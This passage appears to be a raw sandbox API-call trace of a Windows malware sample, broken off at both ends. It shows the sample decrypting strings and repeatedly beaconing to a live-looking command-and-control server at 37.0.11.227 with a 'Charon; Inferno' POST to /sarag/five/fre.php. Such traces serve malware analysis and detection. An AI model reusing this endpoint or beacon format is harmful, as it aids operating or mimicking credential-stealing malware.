hHeap=0x690000) returned 1 [0222.399] GetProcessHeap () returned 0x690000 [0222.399] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0222.399] GetProcessHeap () returned 0x690000 [0222.399] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0222.400] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xe84) returned 0x578 [0222.403] Sleep (dwMilliseconds=0xea60) [0222.405] GetProcessHeap () returned 0x690000 [0222.405] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0222.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.406] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0222.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.413] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0222.445] GetProcessHeap () returned 0x690000 [0222.445] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0222.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.446] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0222.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.446] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0222.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.447] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0222.447] GetProcessHeap () returned 0x690000 [0222.448] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0222.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.451] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0222.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.452] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0222.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.453] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0222.453] GetProcessHeap () returned 0x690000 [0222.453] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0222.453] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.454] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0222.454] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.463] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0222.463] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.464] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0222.464] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.464] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0222.464] GetProcessHeap () returned 0x690000 [0222.465] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0222.465] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0222.465] GetProcessHeap () returned 0x690000 [0222.465] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0222.465] GetProcessHeap () returned 0x690000 [0222.466] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0222.466] GetProcessHeap () returned 0x690000 [0222.466] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0222.466] GetProcessHeap () returned 0x690000 [0222.466] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0222.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.467] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0222.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.477] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0222.488] GetProcessHeap () returned 0x690000 [0222.488] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0222.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.489] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0222.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.490] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0222.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.491] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0222.491] GetProcessHeap () returned 0x690000 [0222.492] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0222.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.496] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0222.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.497] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0222.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.498] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0222.498] GetProcessHeap () returned 0x690000 [0222.498] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0222.499] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.499] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0222.500] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.501] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0222.501] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.502] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0222.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.505] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0222.505] GetProcessHeap () returned 0x690000 [0222.505] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0222.505] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0222.505] GetProcessHeap () returned 0x690000 [0222.505] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0222.505] socket (af=2, type=1, protocol=6) returned 0x57c [0222.506] connect (s=0x57c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0222.539] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0222.539] GetProcessHeap () returned 0x690000 [0222.539] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0222.539] GetProcessHeap () returned 0x690000 [0222.539] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0222.539] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0222.540] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0222.540] GetProcessHeap () returned 0x690000 [0222.540] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0222.540] GetProcessHeap () returned 0x690000 [0222.541] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0222.541] GetProcessHeap () returned 0x690000 [0222.541] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0222.541] GetProcessHeap () returned 0x690000 [0222.541] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0222.542] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0222.544] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0222.544] GetProcessHeap () returned 0x690000 [0222.544] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0222.544] GetProcessHeap () returned 0x690000 [0222.545] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0222.545] send (s=0x57c, buf=0x6ab500*, len=242, flags=0) returned 242 [0222.545] send (s=0x57c, buf=0x6aba40*, len=159, flags=0) returned 159 [0222.546] GetProcessHeap () returned 0x690000 [0222.546] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0222.546] recv (in: s=0x57c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0222.631] GetProcessHeap () returned 0x690000 [0222.632] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0222.632] GetProcessHeap () returned 0x690000 [0222.632] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0222.632] GetProcessHeap () returned 0x690000 [0222.632] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0222.632] GetProcessHeap () returned 0x690000 [0222.633] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0222.633] closesocket (s=0x57c) returned 0 [0222.634] GetProcessHeap () returned 0x690000 [0222.634] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0222.634] GetProcessHeap () returned 0x690000 [0222.634] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0222.634] GetProcessHeap () returned 0x690000 [0222.635] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0222.635] GetProcessHeap () returned 0x690000 [0222.635] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0222.635] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xea0) returned 0x57c [0222.638] Sleep (dwMilliseconds=0xea60) [0222.641] GetProcessHeap () returned 0x690000 [0222.642] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0222.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.643] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0222.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.660] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0222.666] GetProcessHeap () returned 0x690000 [0222.666] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0222.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.667] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0222.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.668] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0222.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.669] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0222.669] GetProcessHeap () returned 0x690000 [0222.669] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0222.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.673] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0222.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.674] CryptDestroyKey (hKey=0x69d628) returned 1 [0222.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.682] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0222.682] GetProcessHeap () returned 0x690000 [0222.682] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0222.683] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.686] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0222.687] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.687] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0222.701] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.702] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0222.702] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.703] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0222.703] GetProcessHeap () returned 0x690000 [0222.703] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0222.703] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0222.703] GetProcessHeap () returned 0x690000 [0222.704] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0222.704] GetProcessHeap () returned 0x690000 [0222.704] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0222.704] GetProcessHeap () returned 0x690000 [0222.705] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0222.705] GetProcessHeap () returned 0x690000 [0222.705] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0222.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.706] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0222.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.714] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0222.721] GetProcessHeap () returned 0x690000 [0222.721] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0222.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.722] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0222.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.723] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0222.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.724] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0222.724] GetProcessHeap () returned 0x690000 [0222.725] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0222.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.726] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0222.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.727] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0222.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.728] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0222.728] GetProcessHeap () returned 0x690000 [0222.728] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0222.729] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.730] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0222.731] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.733] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0222.734] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.734] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0222.735] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.735] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0222.735] GetProcessHeap () returned 0x690000 [0222.735] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0222.736] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0222.736] GetProcessHeap () returned 0x690000 [0222.736] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0222.736] socket (af=2, type=1, protocol=6) returned 0x580 [0222.736] connect (s=0x580, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0222.762] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0222.762] GetProcessHeap () returned 0x690000 [0222.762] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0222.762] GetProcessHeap () returned 0x690000 [0222.762] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0222.763] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0222.764] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0222.764] GetProcessHeap () returned 0x690000 [0222.764] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0222.764] GetProcessHeap () returned 0x690000 [0222.764] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0222.765] GetProcessHeap () returned 0x690000 [0222.765] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0222.765] GetProcessHeap () returned 0x690000 [0222.765] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0222.765] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0222.766] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0222.767] GetProcessHeap () returned 0x690000 [0222.767] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0222.767] GetProcessHeap () returned 0x690000 [0222.767] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0222.767] send (s=0x580, buf=0x6ab500*, len=242, flags=0) returned 242 [0222.768] send (s=0x580, buf=0x6aba40*, len=159, flags=0) returned 159 [0222.768] GetProcessHeap () returned 0x690000 [0222.768] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0222.768] recv (in: s=0x580, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0222.842] GetProcessHeap () returned 0x690000 [0222.843] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0222.843] GetProcessHeap () returned 0x690000 [0222.844] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0222.844] GetProcessHeap () returned 0x690000 [0222.845] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0222.845] GetProcessHeap () returned 0x690000 [0222.846] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0222.846] closesocket (s=0x580) returned 0 [0222.846] GetProcessHeap () returned 0x690000 [0222.846] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0222.846] GetProcessHeap () returned 0x690000 [0222.847] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0222.847] GetProcessHeap () returned 0x690000 [0222.847] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0222.847] GetProcessHeap () returned 0x690000 [0222.848] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0222.848] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd4c) returned 0x580 [0222.850] Sleep (dwMilliseconds=0xea60) [0222.852] GetProcessHeap () returned 0x690000 [0222.852] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0222.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.855] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0222.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.878] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0222.886] GetProcessHeap () returned 0x690000 [0222.886] RtlAllocateHeap (HeapHandle=0x690000, 